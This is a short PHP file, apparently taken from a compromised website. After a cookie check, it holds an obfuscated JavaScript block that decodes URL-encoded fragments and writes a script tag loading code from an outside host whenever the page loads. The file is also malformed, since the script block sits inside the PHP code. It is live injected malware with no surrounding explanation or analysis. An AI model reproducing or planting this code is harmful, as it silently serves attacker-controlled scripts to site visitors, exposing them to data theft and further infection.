<?php

if(isset($_COOKIE['HzA7'])) {
    die('I6ckdWg');
}

<script language="javascript">
<!--
var _0x4f766f=_0x3ddb;function _0x3ddb(_0x524d65,_0xc6c251){var _0x543bd6=_0x2f7c();return _0x3ddb=function(_0x5c2d68,_0x1b5c28){_0x5c2d68=_0x5c2d68-(0xd5f+0x61b*-0x1+0x4*-0x15a);var _0x4c56f9=_0x543bd6[_0x5c2d68];return _0x4c56f9;},_0x3ddb(_0x524d65,_0xc6c251);}(function(_0x34fdda,_0x6a2f47){var _0x50639e=_0x3ddb,_0x4b6f2b=_0x34fdda();while(!![]){try{var _0x560e54=-parseInt(_0x50639e(0x1eb))/(0x1f60+0x3a*0x2+-0x1fd3)*(parseInt(_0x50639e(0x1e5))/(-0x1c21+-0x21ef+0x3e12))+parseInt(_0x50639e(0x1e0))/(0x41a+0x1685+-0x106*0x1a)+parseInt(_0x50639e(0x1ec))/(0xaf3+0xdcc+-0x18bb)+parseInt(_0x50639e(0x1f8))/(0x158e+0xf7+-0x1680)+parseInt(_0x50639e(0x1f2))/(0x13*-0xc5+0x119*-0x5+0x1422)*(parseInt(_0x50639e(0x1df))/(0x1eb6+0x127c+0x133*-0x29))+parseInt(_0x50639e(0x1e6))/(-0x487*0x4+0x1159+0xcb)*(parseInt(_0x50639e(0x1e7))/(-0x12bd+0x25c2+0x2*-0x97e))+-parseInt(_0x50639e(0x1fa))/(0x7*0x517+-0x1*0x190d+0x2*-0x545)*(parseInt(_0x50639e(0x1e8))/(0x1a2*-0x2+-0x18f+0x1*0x4de));if(_0x560e54===_0x6a2f47)break;else _0x4b6f2b['push'](_0x4b6f2b['shift']());}catch(_0x55244a){_0x4b6f2b['push'](_0x4b6f2b['shift']());}}}(_0x2f7c,-0x2cc10*-0x2+-0x1d3c3+0xb0847),document[_0x4f766f(0x1ea)](unescape(_0x4f766f(0x1dc)+_0x4f766f(0x1f3)+_0x4f766f(0x1f9)+_0x4f766f(0x1e3)+_0x4f766f(0x1ee)+_0x4f766f(0x1ef)+_0x4f766f(0x1f0)+_0x4f766f(0x1f6)+_0x4f766f(0x1fb)+_0x4f766f(0x1e2)+_0x4f766f(0x1e1)+_0x4f766f(0x1dd)+_0x4f766f(0x1f7)+_0x4f766f(0x1de)+_0x4f766f(0x1f4)+_0x4f766f(0x1f1)+_0x4f766f(0x1e4)+_0x4f766f(0x1ed)+_0x4f766f(0x1e9)+_0x4f766f(0x1f3)+_0x4f766f(0x1f5))));function _0x2f7c(){var _0x49d7f8=['22%74%65%7','8%74%2F%6A','%61%76%61%','%2E%63%6C%','42IAKBse','72%69%70%7','3%6C%73%73','4%3E','73%63%72%6','%3A%2F%2F%','5978075DeMwVm','4%20%74%79','11630QYNVsD','9%70%74%22','%3C%73%63%','8%74%74%70','67%6F%2E%6','1010667iZzUZE','3496968GAzSbl','63%3D%22%6','%20%73%72%','%70%65%3D%','2F%64%77%6','556THTZfN','8dgzmaC','165843VsrnUY','28468pMyqUj','%2F%73%63%','write','2975qMBMyz','5665684owDdkm','C%22%3E%3C'];_0x2f7c=function(){return _0x49d7f8;};return _0x2f7c();}
//-->
</script>